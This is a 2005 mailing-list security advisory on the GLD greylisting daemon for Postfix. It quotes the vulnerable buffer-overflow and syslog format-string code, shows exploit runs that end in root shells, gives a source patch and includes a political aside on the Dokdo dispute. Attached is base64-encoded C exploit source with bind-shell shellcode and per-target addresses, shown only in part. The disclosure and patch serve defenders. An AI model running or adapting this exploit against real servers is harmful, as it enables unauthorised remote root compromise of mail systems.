GLD (Greylisting daemon for Postfix) multiple vulnerabilities.
From: "dong-hun you" <xploit@hackermail.com.>
To: [email protected], [email protected],
Date: Tue, 12 Apr 2005 08:41:08 +0800
Subject: GLD (Greylisting daemon for Postfix) multiple vulnerabilities.
X-Originating-Ip: 211.171.151.10
X-Originating-Server: ws4-4.us4.outblaze.com
Message-Id: <20050412004111.562AC7A890E@ws4-4.us4.outblaze.com.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
This is a multi-part message in MIME format...
------------=_1113266468-3900-0
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
INetCop Security Advisory #2005-0x82-026
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Title: GLD (Greylisting daemon for Postfix) multiple vulnerabilities.
0x01. Description
About:
Gld is a standalone greylisting server for Postfix.
Greylisting is a new weapon to use against spam. For more information on
this technique, see http://www.greylisting.org.
This implementation listens on a TCP port and uses MySQL for storing data.
The server supports whitelists based on sender, sender domain and client I=
P.
It also supports light greylisting.
URL: http://www.gasmi.net/gld.html
Reference URL: http://www.gasmi.net/down/gld-readme
It's using in FreeBSD port and gentoo, debian.
Reference URL: http://wyae.de/docs/greylisting_on_debian.php
Reference URL: http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/gld/
Reference URL: http://gentoo-portage.com/mail-filter/gld
Reference URL: http://directory.fsf.org/email/spam/gld.html
The program has plenty of remote vulnerabilities.
These vulnerabilities can be used remote user to gain root privilege.
#1) Multi-oveflow vulnerability
This problem happens because of abuse of strcpy() and sprintf() functions
`/gid-1.4/server.c':
--
...
195 int HandleChild(int s,config *cnf)
196 {
197 char buff[BLEN];
198 char request[BLEN];
199 char sender[BLEN];
200 char recipient[BLEN];
201 char ip[BLEN];
...
301 if(strcmp(request,REQ)!=3D0 || recipient[0]=3D=3D0 || ip[0]=3D=3D0)
302 {
303 sprintf(buff,"Received invalid data req=3D(%s) sender=3D(%s=
) recipient=3D(%s) ip=3D(%s)",request,sender,recipient,ip); // here
304 if(cnf->syslog=3D=3D1) ErrorLog(cnf,buff);
305 if(cnf->debug=3D=3D1) printf("%d: %s\n",pid,buff);
306 return(-2);
307 }
...
--
Remote overflow exploit can be happened by sprintf() and it allows attacke=
r to gain root privilege.
#2) remote format string -
These vulnerabilities are very easy to be exploited.
gld.conf is supporting syslog() function basically.
Thereby, with problem in next code, it's possible to gain root privilege.
`/gld-1.4/cnf.c':
--
...
117 void ErrorLog(config *conf,char *msg)
118 {
119 #ifdef HAVE_SYSLOG_H
120 openlog("gld",0,conf->facility);
121 syslog(LOG_ALERT,msg); // here
122 closelog();
123 #endif
124 }
...
--
It happens by illegal use of syslog() function.
--
bash-2.04# cat *.c |grep ErrorLog |grep -v void
if(conf.syslog=3D=3D1) ErrorLog(&conf,"gld started, up and running");
if(cid < 0 && conf.syslog=3D=3D1) ErrorLog(&conf,"Fork ret=
urned error code, no child");
ErrorLog(cnf,buff);
if(cnf->syslog=3D=3D1) ErrorLog(cnf,"Read Network error");
if(cnf->syslog=3D=3D1) ErrorLog(cnf,buff);
if(cnf->syslog=3D=3D1) ErrorLog(cnf,"MySQL error");
bash-2.04#
--
It can be exploited pretty easily.
And there are alot more sprintf(), strcpy() function overflow vulnerabilit=
ies which are not mentioned.
0x02. Vulnerable Packages
Vendor site: http://www.gasmi.net/gld.html
GLD all version (exploitable)
-gld-1.4.tgz
-gld.1.3.tgz
0x03. Exploit
I made this exploit in RedHat Linux 7.x and 9.x by Proof of Concept code.
There is no plan to develop other platform code.
#1) remote buffer overflow exploit:
bash-2.04$ ./0x82-meOw_linuxer_forever -t 3 -h x0x
#
# 0x82-meOw_linuxer_forever - Greylisting daemon for Postfix remote explo=
it
# szoahc(at)hotmail(dot)com
#
#
# target host: x0x:2525
# type: Red Hat Linux release 9 (Shrike) gld 1.4 (buffer overflow exploit)
# method: jmp *%esp exploit: 254 byte
# send code size: 2200 byte
#
# Waiting rootshell, Trying x0x:36864 ...
# connected to x0x:36864 !
#
#
# Kill two bird with one stone!
# OK, It's Rootshell
#
Linux x0x 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
uid=3D0(root) gid=3D0(root) groups=3D0(root),1(bin),2(daemon),3(sys),4(adm=
),6(disk),10(wheel)
bash: no job control in this shell
stty: standard input: Invalid argument
[root@x0x /]# w
#2) remote format string exploit:
bash-2.04$ ./0x82-meOw_linuxer_forever -t 0 -h x0x
#
# 0x82-meOw_linuxer_forever - Greylisting daemon for Postfix remote explo=
it
# szoahc(at)hotmail(dot)com
#
#
# target host: x0x:2525
# type: Red Hat Linux release 9 (Shrike) gld 1.4 (format string exploit)
# Make format string, .dtors: 0x804d14c
#
# shellcode addr: 0x805506e, size: 320 byte
# send code size: 394 byte
#
# Waiting rootshell, Trying x0x:36864 ...
# connected to x0x:36864 !
#
#
# Kill two bird with one stone!
# OK, It's Rootshell
#
Linux x0x 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
uid=3D0(root) gid=3D0(root) groups=3D0(root),1(bin),2(daemon),3(sys),4(adm=
),6(disk),10(wheel)
bash: no job control in this shell
stty: standard input: Invalid argument
[root@x0x /]#
0x04. Patch
GLD 1.4 patch:
=3D=3D=3D gld-1.4.patch =3D=3D=3D
--- cnf.c 2004-08-18 23:44:22.000000000 +0900
+++ patch/cnf.c 2005-03-06 17:36:04.000000000 +0900
@@ -118,7 +118,7 @@
{
#ifdef HAVE_SYSLOG_H
openlog("gld",0,conf->facility);
-syslog(LOG_ALERT,msg);
+syslog(LOG_ALERT,"%s",msg);
closelog();
#endif
}
--- greylist.c 2004-08-18 04:12:38.000000000 +0900
+++ patch/greylist.c 2005-03-06 17:39:59.000000000 +0900
@@ -20,9 +20,9 @@
pid=3Dgetpid();
=20
ts=3Dtime(0);
-strcpy(oip,ip);
-strcpy(osender,sender);
-strcpy(orecipient,recipient);
+strncpy(oip,ip,sizeof(oip)-1);
+strncpy(osender,sender,sizeof(osender)-1);
+strncpy(orecipient,recipient,sizeof(orecipient)-1);
=20
if(conf->debug=3D=3D1) printf("%d: Starting the greylist algo\n",pid);
=20
@@ -52,17 +52,17 @@
if(conf->debug=3D=3D1) printf("%d: lightgrey on domain is on, let'=
s keep the domain only on recipient and sender\n",pid);
=20
domain=3D(char *)strstr(osender,"@");
- if(domain!=3DNULL) strcpy(sender,domain);
+ if(domain!=3DNULL) strncpy(sender,domain,BLEN-1);
=20
domain=3D(char *)strstr(orecipient,"@");
- if(domain!=3DNULL) strcpy(recipient,domain);
+ if(domain!=3DNULL) strncpy(recipient,domain,BLEN-1);
}
=20
//
// Do we have this entry in our database ?
//
=20
-sprintf(query,"select first from greylist where ip=3D'%s' and sender=3D'%s=
' and recipient=3D'%s'",ip,sender,recipient);
+snprintf(query,sizeof(query)-1,"select first from greylist where ip=3D'%s'=
and sender=3D'%s' and recipient=3D'%s'",ip,sender,recipient);
n=3DSQLQuery(query);
=20
if(conf->debug=3D=3D1) printf("%d: Query=3D(%s) result=3D%ld\n",pid,query,=
n);
@@ -78,7 +78,7 @@
//
if(conf->lightd=3D=3D1 && n=3D=3D0)
{
- sprintf(query,"select first from greylist where ip=3D'%s' and send=
er=3D'%s' and recipient=3D'%s'",ip,osender,orecipient);
+ snprintf(query,sizeof(query)-1,"select first from greylist where i=
p=3D'%s' and sender=3D'%s' and recipient=3D'%s'",ip,osender,orecipient);
n=3DSQLQuery(query);
if(n<0) return(-1);
if(n=3D=3D0) fneither=3D1; else fnotdomain=3D1;
@@ -101,7 +101,7 @@
domain=3D(char *)strstr(osender,"@");
if(domain=3D=3DNULL) domain=3Dosender;
=20
- strcpy(netw,oip);
+ strncpy(netw,oip,sizeof(netw)-1);
l=3Dstrlen(netw);
for(i=3Dl-1;i>=3D0;i--)
if(netw[i]=3D=3D'.')
@@ -111,7 +111,7 @@
}
=20
=20
- sprintf(query,"select count(mail) from whitelist where mail in ('%=
s','%s','%s','%s')",osender,domain,oip,netw);
+ snprintf(query,sizeof(query)-1,"select count(mail) from whitelist =
where mail in ('%s','%s','%s','%s')",osender,domain,oip,netw);
n=3DSQLQuery(query);
if(conf->debug=3D=3D1) printf("%d: Query=3D(%s) result=3D%ld\n",pid,query=
,n);
if(n>0)
@@ -130,7 +130,7 @@
x=3Dsscanf(oip,"%d.%d.%d.%d",&a,&b,&c,&d);
if(x=3D=3D4)
{
- sprintf(query,"%d.%d.%d.%d.%s",d,c,b,a,conf->dnswl);
+ snprintf(query,sizeof(query)-1,"%d.%d.%d.%d.%s",d,c,b,a,conf->dnswl);
n=3DDnsIp(query,NULL);
if(conf->debug=3D=3D1) printf("%d: DNSQuery=3D(%s) result=3D%ld\n",pid,=
query,n);
if(n=3D=3D0)
@@ -146,9 +146,9 @@
// was not whitelisted and thus we have to insert it
//
if(conf->lightd=3D=3D1 && fneither=3D=3D1)
- sprintf(query,"insert into greylist values('%s','%s','%s',=
%d,%d,1)",ip,osender,orecipient,ts,ts);
+ snprintf(query,sizeof(query)-1,"insert into greylist value=
s('%s','%s','%s',%d,%d,1)",ip,osender,orecipient,ts,ts);
=20
- else sprintf(query,"insert into greylist values('%s','%s','%s',%d,%d,=
1)",ip,sender,recipient,ts,ts);
+ else snprintf(query,sizeof(query)-1,"insert into greylist values('%s'=
,'%s','%s',%d,%d,1)",ip,sender,recipient,ts,ts);
=20
SQLQuery(query);
if(conf->debug=3D=3D1) printf("%d: Query=3D(%s)\n",pid,query);
@@ -165,9 +165,9 @@
if(conf->update=3D=3D1)
{
if(conf->lightd=3D=3D1 && fnotdomain=3D=3D1)
- sprintf(query,"update greylist set last=3D%d,n=3Dn+1 where ip=3D=
'%s' and sender=3D'%s' and recipient=3D'%s'",ts,ip,osender,orecipient);
+ snprintf(query,sizeof(query)-1,"update greylist set last=3D%d,n=
=3Dn+1 where ip=3D'%s' and sender=3D'%s' and recipient=3D'%s'",ts,ip,osende=
r,orecipient);
=20
- else sprintf(query,"update greylist set last=3D%d,n=3Dn+1 where i=
p=3D'%s' and sender=3D'%s' and recipient=3D'%s'",ts,ip,sender,recipient);
+ else snprintf(query,sizeof(query)-1,"update greylist set last=3D%=
d,n=3Dn+1 where ip=3D'%s' and sender=3D'%s' and recipient=3D'%s'",ts,ip,sen=
der,recipient);
=20
SQLQuery(query);
if(conf->debug=3D=3D1) printf("%d: Query=3D(%s)\n",pid,query);
@@ -180,7 +180,7 @@
=20
if(ts-n>conf->mini && conf->lightd=3D=3D1 && fnotdomain=3D=3D1)
{
- sprintf(query,"insert into greylist values('%s','%s','%s',%d,%d,1)",ip,s=
ender,recipient,ts,ts);
+ snprintf(query,sizeof(query)-1,"insert into greylist values('%s','%s','%=
s',%d,%d,1)",ip,sender,recipient,ts,ts);
if(conf->debug=3D=3D1) printf("Add the domain triplet for next time.\n");
SQLQuery(query);
}
--- server.c 2004-08-19 07:57:03.000000000 +0900
+++ patch/server.c 2005-03-06 17:41:52.000000000 +0900
@@ -215,7 +215,7 @@
if(cnf->debug=3D=3D1) printf("%d: Rejected New incoming connexion from %s=
(%s)\n",pid,buff,ip);
if(cnf->syslog=3D=3D1)
{
- sprintf(buff,"Rejected New incoming connexion from %s (%s)\n",buff,ip);
+ snprintf(buff,sizeof(buff)-1,"Rejected New incoming connexion from %s (%=
s)\n",buff,ip);
ErrorLog(cnf,buff);
}
=20
@@ -262,16 +262,16 @@
if(strcmp(buff,"")=3D=3D0) break;
=20
if(strncmp(buff,"request=3D",8)=3D=3D0)
- strcpy(request,buff+8);
+ strncpy(request,buff+8,sizeof(request)-1);
=20
if(strncmp(buff,"sender=3D",7)=3D=3D0)
- strcpy(sender,buff+7);
+ strncpy(sender,buff+7,sizeof(sender)-1);
=20
if(strncmp(buff,"recipient=3D",10)=3D=3D0)
- strcpy(recipient,buff+10);
+ strncpy(recipient,buff+10,sizeof(recipient)-1);
=20
if(strncmp(buff,"client_address=3D",15)=3D=3D0)
- strcpy(ip,buff+15);
+ strncpy(ip,buff+15,sizeof(ip)-1);
=20
}
=20
@@ -300,7 +300,7 @@
=20
if(strcmp(request,REQ)!=3D0 || recipient[0]=3D=3D0 || ip[0]=3D=3D0)
{
- sprintf(buff,"Received invalid data req=3D(%s) sender=3D(%s) recipient=3D=
(%s) ip=3D(%s)",request,sender,recipient,ip);
+ snprintf(buff,sizeof(buff)-1,"Received invalid data req=3D(%s) sender=3D(=
%s) recipient=3D(%s) ip=3D(%s)",request,sender,recipient,ip);
if(cnf->syslog=3D=3D1) ErrorLog(cnf,buff);
if(cnf->debug=3D=3D1) printf("%d: %s\n",pid,buff);
return(-2);
@@ -322,7 +322,7 @@
=20
if(n=3D=3D0)
{
- sprintf(buff,"action=3Ddefer_if_permit %s\n\n",cnf->message);
+ snprintf(buff,sizeof(buff)-1,"action=3Ddefer_if_permit %s\n\n",cnf->messa=
ge);
WriteSocket(s,buff,strlen(buff),TOUT);
if(cnf->syslog=3D=3D1) Log(cnf,recipient,sender,ip,MSGGREYLIST);
if(cnf->debug=3D=3D1) printf("%d: Decision is to greylist\n",pid);
=3D=3D=3D eof =3D=3D=3D
P.S: Sorry, for my poor english.
--
These days, the main issue that strikes Korea is small rocky island "Dokdo=
".
You can get more detailed information from following websites.
"Japanese goverment has to follow and learn from German goverment"
I can confidently say "Dokdo is belong to Korea".
(1) reference=20
1) Their claim that the East Sea has some historical precedent worked,
as some major book and map publishers, educational web sites and other
reference materials now include the East Sea name along with the Sea of Ja=
pan.
- worldatlas.com-
http://www.worldatlas.com/webimage/countrys/asia/eastsea.htm
2) On historical perspective and in international law, why there
is no valid dispute over the ownership of Dokdo.
http://www.prkorea.com/english/textbook/ge03.html
3) Truth in scholarship
http://www.prkorea.com/english/textbook/maintruth.html
--
By "dong-houn yoU" (Xpl017Elz), in INetCop Security Co., LTD.
MSN & E-mail: szoahc(at)hotmail(dot)com,
xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.net
My World: http://x82.inetcop.org
GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--
--=20
_______________________________________________
Get your free email from http://www.hackermail.com
Powered by Outblaze
------------=_1113266468-3900-0
Content-Type: application/octet-stream; name="0x82-meOw_linuxer_forever.c"
Content-Disposition: attachment; filename="0x82-meOw_linuxer_forever.c"
Content-Transfer-Encoding: base64
LyoKKioKKioKKiogMHg4Mi1tZU93LWxpbnV4ZXJfZm9yZXZlciAtIGdsZCAx
LjQgcmVtb3RlIG92ZXJmbG93IGZvcm1hdCBzdHJpbmcgZXhwbG9pdC4KKiog
KGMpIDIwMDUgVGVhbSBJTmV0Q29wIFNlY3VyaXR5LgoqKgoqKiBOaWNrbmFt
ZSBvZiB0aGlzIGNvZGUgaXMsCioqIGBLaWxsIHR3byBiaXJkIHdpdGggb25l
IHN0b25lLicgb3IsIGBPbmUgc2hvdCwgdHdvIGtpbGwhLicKKiogaGVoZWhl
IDstRAoqKgoqKiBBZHZpc29yeSBVUkw6IGh0dHA6Ly94ODIuaW5ldGNvcC5v
cmcvaDBtZS9hZHYxc29yMWVzL0lOQ1NBLjIwMDUtMHg4Mi0wMjYtR0xELnR4
dAoqKgoqKiBJdCdzIGFzIHdlbGwgYXMgUmVkSGF0IExpbnV4IGFuZCB0byBn
ZW50b28sIGRlYmlhbiBMaW51eCwgKkJTRC4KKiogWW91IGNhbiBkZXZlbG9w
IGZvciB5b3VyIGZsYXRmb3JtLgoqKgoqKiAtLQoqKiBleHBsb2l0IGJ5ICJ5
b3UgZG9uZy1odW4iKFhwbDAxN0VseiksIDxzem9haGNAaG90bWFpbC5jb20+
LgoqKiBNeSBXb3JsZDogaHR0cDovL3g4Mi5pbmV0Y29wLm9yZwoqKgoqKgoq
KiBQLlM6IE15IGRvbWFpbiB4ODIuaTIxYy5uZXQgZW5jb3VudGVyZWQgY29t
cHVsc2lvbiB3aXRoZHJhd2FsIGZyb20gdGhlIGNvdW50cnkuCioqICAgICAg
VGhleSBhcmUga2lsbGluZyBtYW55IGhhY2tlcnMgb2YgdGhlIEtvcmVhLiBo
ZWhlaGUgOy1wCioqCiovCi8qCioqCioqIFRoZXNlIGRheXMsIHRoZSBtYWlu
IGlzc3VlIHRoYXQgc3RyaWtlcyBLb3JlYSBpcyBzbWFsbCByb2NreSBpc2xh
bmQgIkRva2RvIi4KKiogWW91IGNhbiBnZXQgbW9yZSBkZXRhaWxlZCBpbmZv
cm1hdGlvbiBmcm9tIGZvbGxvd2luZyB3ZWJzaXRlcy4KKioKKiogIkphcGFu
ZXNlIGdvdmVybWVudCBoYXMgdG8gZm9sbG93IGFuZCBsZWFybiBmcm9tIEdl
cm1hbiBnb3Zlcm1lbnQiCioqCioqIEkgY2FuIGNvbmZpZGVudGx5IHNheSAi
RG9rZG8gaXMgYmVsb25nIHRvIEtvcmVhIi4KKioKKiogKDEpIHJlZmVyZW5j
ZSAKKioKKiogMSkgIFRoZWlyIGNsYWltIHRoYXQgdGhlIEVhc3QgU2VhIGhh
cyBzb21lIGhpc3RvcmljYWwgcHJlY2VkZW50IHdvcmtlZCwKKiogYXMgc29t
ZSBtYWpvciBib29rIGFuZCBtYXAgcHVibGlzaGVycywgZWR1Y2F0aW9uYWwg
d2ViIHNpdGVzIGFuZCBvdGhlcgoqKiByZWZlcmVuY2UgbWF0ZXJpYWxzIG5v
dyBpbmNsdWRlIHRoZSBFYXN0IFNlYSBuYW1lIGFsb25nIHdpdGggdGhlIFNl
YSBvZiBKYXBhbi4KKiogLSB3b3JsZGF0bGFzLmNvbS0KKioKKiogaHR0cDov
L3d3dy53b3JsZGF0bGFzLmNvbS93ZWJpbWFnZS9jb3VudHJ5cy9hc2lhL2Vh
c3RzZWEuaHRtCioqCioqIDIpIE9uIGhpc3RvcmljYWwgcGVyc3BlY3RpdmUg
YW5kIGluIGludGVybmF0aW9uYWwgbGF3LCB3aHkgdGhlcmUKKiogaXMgbm8g
dmFsaWQgZGlzcHV0ZSBvdmVyIHRoZSBvd25lcnNoaXAgb2YgRG9rZG8uCioq
CioqIGh0dHA6Ly93d3cucHJrb3JlYS5jb20vZW5nbGlzaC90ZXh0Ym9vay9n
ZTAzLmh0bWwKKioKKiogMylUcnV0aCBpbiBzY2hvbGFyc2hpcAoqKgoqKiBo
dHRwOi8vd3d3LnBya29yZWEuY29tL2VuZ2xpc2gvdGV4dGJvb2svbWFpbnRy
dXRoLmh0bWwKKioKKioKKi8KCiNpbmNsdWRlIDxzdGRpby5oPgojaW5jbHVk
ZSA8dW5pc3RkLmg+CiNpbmNsdWRlIDxuZXRkYi5oPgojaW5jbHVkZSA8bmV0
aW5ldC9pbi5oPgojaW5jbHVkZSA8c3lzL3NvY2tldC5oPgoKI2RlZmluZSBE
RUZfSE9TVCAibG9jYWxob3N0IgojZGVmaW5lIFBPUlQgMjUyNQoKc3RydWN0
IG9zX3QgewoJaW50IG51bWJlcjsKCWNoYXIgKm9zX3R5cGU7Cgl1bnNpZ25l
ZCBsb25nIGR0b3JzX2FkZHI7Cgl1bnNpZ25lZCBsb25nIHNoZWxsOwoJaW50
IHNmbGFnOwp9OwoKc3RydWN0IG9zX3QgcGxhdGZvcm1bXT17Cgl7CgkJMCwi
UmVkIEhhdCBMaW51eCByZWxlYXNlIDcuMCAoR3Vpbm5lc3MpIGdsZCAxLjQg
KGZvcm1hdCBzdHJpbmcgZXhwbG9pdCkiLAoJCTB4MDgwNGRiOTgsMHhiZmZm
YTNiYywxNQoJfSwKCXsKCQkxLCJSZWQgSGF0IExpbnV4IHJlbGVhc2UgOSAo
U2hyaWtlKSBnbGQgMS40IChmb3JtYXQgc3RyaW5nIGV4cGxvaXQpIiwKCQkw
eDA4MDRkMTRjLDB4MDgwNTUwNmUsMTUKCX0sCgl7CgkJMiwiUmVkIEhhdCBM
aW51eCByZWxlYXNlIDcuMCAoR3Vpbm5lc3MpIGdsZCAxLjQgKGJ1ZmZlciBv
dmVyZmxvdyBleHBsb2l0KSIsCgkJMCwweGJmZmZhNWQ4LDMwMAoJfSwKCXsK
CQkvKiBqbXAgKiVlc3AgbWV0aG9kICovCgkJMywiUmVkIEhhdCBMaW51eCBy
ZWxlYXNlIDkgKFNocmlrZSkgZ2xkIDEuNCAoYnVmZmVyIG92ZXJmbG93IGV4
cGxvaXQpIiwKCQkwLDB4NDIxMmM1ZWIsMjU0Cgl9LAoJewoJCTQsTlVMTCww
LDAsMAoJfQp9OwoKaW50IF9fZGVidWdfY2hrPTA7CmNoYXIgdF9hdGtbMHhm
ZmYqM107Ci8vIFRoaXMgaXMgbG92YWJsZSBzaGVsbGNvZGUsIHRoYXQncyBz
d2VldCBpbiBsaW51eCBwbGF0Zm9ybS4gCmNoYXIgc2hlbGxjb2RlW109IC8q
IHBvcnRzaGVsbCBzaGVsbGNvZGUsIDEyOCBieXRlcyAodGNwLzM2ODY0KSAq
LwoJIlx4ZWJceDcyXHg1ZVx4MjlceGMwXHg4OVx4NDZceDEwXHg0MFx4ODlc
eGMzXHg4OVx4NDZceDBjXHg0MFx4ODkiCgkiXHg0Nlx4MDhceDhkXHg0ZVx4
MDhceGIwXHg2Nlx4Y2RceDgwXHg0M1x4YzZceDQ2XHgxMFx4MTBceDY2XHg4
OSIKCSJceDVlXHgxNFx4ODhceDQ2XHgwOFx4MjlceGMwXHg4OVx4YzJceDg5
XHg0Nlx4MThceGIwXHg5MFx4NjZceDg5IgoJIlx4NDZceDE2XHg4ZFx4NGVc
eDE0XHg4OVx4NGVceDBjXHg4ZFx4NGVceDA4XHhiMFx4NjZceGNkXHg4MFx4
ODkiCgkiXHg1ZVx4MGNceDQzXHg0M1x4YjBceDY2XHhjZFx4ODBceDg5XHg1
Nlx4MGNceDg5XHg1Nlx4MTBceGIwXHg2NiIKCSJceDQzXHhjZFx4ODBceDg2
XHhjM1x4YjBceDNmXHgyOVx4YzlceGNkXHg4MFx4YjBceDNmXHg0MVx4Y2Rc
eDgwIgoJIlx4YjBceDNmXHg0MVx4Y2RceDgwXHg4OFx4NTZceDA3XHg4OVx4
NzZceDBjXHg4N1x4ZjNceDhkXHg0Ylx4MGMiCgkiXHhiMFx4MGJceGNkXHg4
MFx4ZThceDg5XHhmZlx4ZmZceGZmL2Jpbi9zaCI7Cgp2b2lkIGJhbnJsKCk7
CmludCBtYWtlX2JvZl9jb2RlKHVuc2lnbmVkIGxvbmcgc2hlbGwsaW50IHNp
emUsaW50IHR5cGUpOwppbnQgbWFrZV9mbXRfY29kZSh1bnNpZ25lZCBsb25n
IHJldGxvYyx1bnNpZ25lZCBsb25nIHNoZWxsLGludCBzZmxhZyk7CmludCBz
ZXRzb2NrKGNoYXIgKmhvc3QsaW50IHBvcnQpOwp2b2lkIHVzYWdlKGNoYXIg
KmFyZ3MpOwp2b2lkIHJlX2Nvbm50KGludCBzb2NrKTsKdm9pZCBjb25uX3No
ZWxsKGludCBzb2NrKTsKCmludCBtYWluKGludCBhcmdjLGNoYXIgKmFyZ3Zb
XSkKewoJaW50IHNvY2ssdHlwZT0wOwoJaW50IHBvcnQ9KFBPUlQpOwoJY2hh
ciBob3N0WzI1Nl09REVGX0hPU1Q7CgoJaW50IHNmbGFnPXBsYXRmb3JtW3R5
cGVdLnNmbGFnOwoJdW5zaWduZWQgbG9uZyByZXRsb2M9cGxhdGZvcm1bdHlw
ZV0uZHRvcnNfYWRkcjsKCXVuc2lnbmVkIGxvbmcgc2hlbGw9cGxhdGZvcm1b
dHlwZV0uc2hlbGw7CgoJKHZvaWQpYmFucmwoKTsKCXdoaWxlKChzb2NrPWdl
dG9wdChhcmdjLGFyZ3YsIkRkRjpmOlI6cjpTOnM6SDpoOlQ6dDpJaSIpKSE9
RU9GKSB7CgkJZXh0ZXJuIGNoYXIgKm9wdGFyZzsKCQlzd2l0Y2goc29jaykg
ewoJCQljYXNlICdEJzoKCQkJY2FzZSAnZCc6CgkJCQlfX2RlYnVnX2Noaz0x
OwoJCQkJYnJlYWs7CgkJCWNhc2UgJ1InOgoJCQljYXNlICdyJzoKCQkJCXJl
dGxvYz1zdHJ0b3VsKG9wdGFyZyxOVUxMLDApOwoJCQkJYnJlYWs7CgkJCWNh
c2UgJ1MnOgoJCQljYXNlICdzJzoKCQkJCXNoZWxsPXN0cnRvdWwob3B0YXJn
LE5VTEwsMCk7CgkJCQlicmVhazsKCQkJY2FzZSAnRic6CgkJCWNhc2UgJ2Yn
OgoJCQkJc2ZsYWc9YXRvaShvcHRhcmcpOwoJCQkJYnJlYWs7CgkJCWNhc2Ug
J0gnOgoJCQljYXNlICdoJzoKCQkJCW1lbXNldCgoY2hhciAqKWhvc3QsMCxz
aXplb2YoaG9zdCkpOwoJCQkJc3RybmNweShob3N0LG9wdGFyZyxzaXplb2Yo
aG9zdCktMSk7CgkJCQlicmVhazsKCQkJY2FzZSAnVCc6CgkJCWNhc2UgJ3Qn
OgoJCQkJdHlwZT1hdG9pKG9wdGFyZyk7CgkJCQlpZih0eXBlPj00KXsKCQkJ
CQkodm9pZCl1c2FnZShhcmd2WzBdKTsKCQkJCX0gZWxzZSB7CgkJCQkJcmV0
bG9jPXBsYXRmb3JtW3R5cGVdLmR0b3JzX2FkZHI7CgkJCQkJc2hlbGw9cGxh
dGZvcm1bdHlwZV0uc2hlbGw7CgkJCQkJc2ZsYWc9cGxhdGZvcm1bdHlwZV0u
c2ZsYWc7CgkJCQl9CgkJCQlicmVhazsKCQkJY2FzZSAnSSc6CgkJCWNhc2Ug
J2knOgoJCQkJKHZvaWQpdXNhZ2UoYXJndlswXSk7CgkJCQlicmVhazsKCQkJ
Y2FzZSAnPyc6CgkJCQlmcHJpbnRmKHN0ZGVyciwiVHJ5IGAlcyAtaScgZm9y
IG1vcmUgaW5mb3JtYXRpb24uXG5cbiIsYXJndlswXSk7CgkJCQlleGl0KC0x
KTsKCQkJCWJyZWFrOwoJCX0KCX0KCglmcHJpbnRmKHN0ZG91dCwiICNcbiAj
IHRhcmdldCBob3N0OiAlczolZFxuIixob3N0LHBvcnQpOwoJZnByaW50Zihz
dGRvdXQsIiAjIHR5cGU6ICVzXG4iLHBsYXRmb3JtW3R5cGVdLm9zX3R5cGUp
OwoJc3dpdGNoKHR5cGUpCgl7CgkJY2FzZSAwOgoJCWNhc2UgMToKCQkJKGlu
dCltYWtlX2ZtdF9jb2RlKHJldGxvYyxzaGVsbCxzZmxhZyk7CgkJCWJyZWFr
OwoJCWNhc2UgMjoKCQkJKGludCltYWtlX2JvZl9jb2RlKHNoZWxsLHNmbGFn
LDApOwoJCQlicmVhazsKCQljYXNlIDM6CgkJCShpbnQpbWFrZV9ib2ZfY29k
ZShzaGVsbCxzZmxhZywxKTsKCX0KCglmcHJpbnRmKHN0ZG91dCwiICMgc2Vu
ZCBjb2RlIHNpemU6ICVkIGJ5dGVcbiIsc3RybGVuKHRfYXRrKSk7Cglzb2Nr
PXNldHNvY2soaG9zdCxwb3J0KTsKCSh2b2lkKXJlX2Nvbm50KHNvY2spOwoK
CWlmKF9fZGVidWdfY2hrKSBzbGVlcCgxMCk7CgoJc2VuZChzb2NrLHRfYXRr
LHN0cmxlbih0X2F0ayksMCk7CgljbG9zZShzb2NrKTsKCglmcHJpbnRmKHN0
ZG91dCwiICNcbiAjIFdhaXRpbmcgcm9vdHNoZWxsLCBUcnlpbmcgJXM6MzY4
NjQgLi4uXG4iLGhvc3QpOwoJc2xlZXAoMSk7Cglzb2NrPXNldHNvY2soaG9z
dCwzNjg2NCk7Cgkodm9pZClyZV9jb25udChzb2NrKTsKCglmcHJpbnRmKHN0
ZG91dCwiICMgY29ubmVjdGVkIHRvICVzOjM2ODY0ICFcbiAjXG5cbiIsaG9z
dCk7Cgkodm9pZCljb25uX3NoZWxsKHNvY2spOwp9CgppbnQgbWFrZV9ib2Zf
Y29kZSh1bnNpZ25lZCBsb25nIHNoZWxsLGludCBzaXplLGludCB0eXBlKQp7
CglpbnQgYSxiOwoJY2hhciBub3Bfc2hlbGxbODE5Ml07CgljaGFyIGNvZGVf
YnVmWzQwOTZdOwoKCW1lbXNldCgoY2hhciAqKW5vcF9zaGVsbCwwLHNpemVv
Zihub3Bfc2hlbGwpKTsKCW1lbXNldCgoY2hhciAqKWNvZGVfYnVmLDAsc2l6
ZW9mKGNvZGVfYnVmKSk7CgltZW1zZXQoKGNoYXIgKil0X2F0aywwLHNpemVv
Zih0X2F0aykpOwoKCXN3aXRjaCh0eXBlKQoJewoJCWNhc2UgMDoKCQkJZnBy
aW50ZihzdGRvdXQsIiAjIG1ldGhvZDogbm9ybWFsIG92ZXJmbG93IGV4cGxv
aXQ6ICVkIGJ5dGVcbiIsc2l6ZSk7CgkJCS8qIHNlbmRlciBidWZmZXIgPSBu
b3AsIHNoZWxsY29kZSAqLwoJCQlmb3IoYT0wO2E8MTAwMC1zdHJsZW4oc2hl
bGxjb2RlKTthKyspCgkJCQlub3Bfc2hlbGxbYV09J04nOwoJCQlmb3IoYj0w
O2I8c3RybGVuKHNoZWxsY29kZSk7YisrKQoJCQkJbm9wX3NoZWxsW2ErK109
c2hlbGxjb2RlW2JdOwoJCQkvKiBjbGllbnRfYWRkcmVzcyA9IHJldGFkZHIg
